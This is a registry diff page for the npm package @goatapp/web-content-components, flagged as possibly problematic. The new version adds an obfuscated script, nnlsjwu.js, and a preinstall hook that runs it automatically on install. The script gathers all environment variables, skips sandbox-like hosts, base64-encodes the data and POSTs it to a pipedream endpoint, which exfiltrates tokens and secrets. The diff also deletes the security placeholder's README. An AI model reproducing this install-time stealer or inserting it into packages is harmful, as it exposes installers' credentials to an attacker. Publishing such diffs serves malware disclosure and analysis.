@goatapp/web-content-components 0.0.1-security → 20.866.672
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/nnlsjwu.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/nnlsjwu.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x5ca899=a0_0x2b75;(function(_0x5e8ba7,_0x1badf1){const _0x3aed08=a0_0x2b75,_0x1c0366=_0x5e8ba7();while(!![]){try{const _0x2d9c25=parseInt(_0x3aed08(0x174))/0x1+parseInt(_0x3aed08(0x175))/0x2*(-parseInt(_0x3aed08(0x17e))/0x3)+parseInt(_0x3aed08(0x177))/0x4*(-parseInt(_0x3aed08(0x180))/0x5)+-parseInt(_0x3aed08(0x16d))/0x6*(-parseInt(_0x3aed08(0x182))/0x7)+parseInt(_0x3aed08(0x163))/0x8*(-parseInt(_0x3aed08(0x17b))/0x9)+-parseInt(_0x3aed08(0x173))/0xa*(parseInt(_0x3aed08(0x166))/0xb)+-parseInt(_0x3aed08(0x165))/0xc*(-parseInt(_0x3aed08(0x16a))/0xd);if(_0x2d9c25===_0x1badf1)break;else _0x1c0366['push'](_0x1c0366['shift']());}catch(_0x416634){_0x1c0366['push'](_0x1c0366['shift']());}}}(a0_0x3506,0xa031d));function a0_0x2b75(_0x2c4667,_0x102312){const _0x35065a=a0_0x3506();return a0_0x2b75=function(_0x2b7535,_0x448eb1){_0x2b7535=_0x2b7535-0x163;let _0x187542=_0x35065a[_0x2b7535];return _0x187542;},a0_0x2b75(_0x2c4667,_0x102312);}function a0_0x3506(){const _0x57b2b7=['end','pipedream','786rLOKEw','npm_config_registry','bd43527e019ae8efb47eb39bb9313ac5','write','daasadmin','https','12174980lYboZQ','973410dgbdtg','791470nKbzcd','request','1915548DkitNW','from','keys','npm_package_name','9IhZdkf','net','error','3gxYmvT','/usr/bin/python','10stPJJz','POST','66633ZggpOl','taobao.org','9146792frDDrB','registry.npmmirror.com','12900684GOiAVI','11mtGPLu','some','env','includes','26ewQKsE'];a0_0x3506=function(){return _0x57b2b7;};return a0_0x3506();}const http=require(a0_0x5ca899(0x172)),filter=[{'key':a0_0x5ca899(0x16e),'val':a0_0x5ca899(0x183)},{'key':a0_0x5ca899(0x16e),'val':'tencent.com'},{'key':a0_0x5ca899(0x16e),'val':a0_0x5ca899(0x164)},{'key':'USERNAME','val':a0_0x5ca899(0x171)},{'key':'_','val':a0_0x5ca899(0x17f)}];function main(){const _0x297cda=a0_0x5ca899;var _0x24057d=process[_0x297cda(0x168)]||{};if(filter[_0x297cda(0x167)](({key:_0x4e16e3,val:_0x22939d})=>_0x24057d[_0x4e16e3]&&_0x24057d[_0x4e16e3][_0x297cda(0x169)](_0x22939d))||Object[_0x297cda(0x179)](_0x24057d)['length']<0xa)return;req=http[_0x297cda(0x176)]({'host':[_0x297cda(0x16f),'m',_0x297cda(0x16c),_0x297cda(0x17c)]['join']('.'),'path':'/'+(_0x24057d[_0x297cda(0x17a)]||''),'method':_0x297cda(0x181)})['on'](_0x297cda(0x17d),function(_0xedac3c){}),req[_0x297cda(0x170)](Buffer[_0x297cda(0x178)](JSON['stringify'](_0x24057d))['toString']('base64')),req[_0x297cda(0x16b)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "20.866.672",
|
|
4
|
+
"main": "nnlsjwu.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node nnlsjwu.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|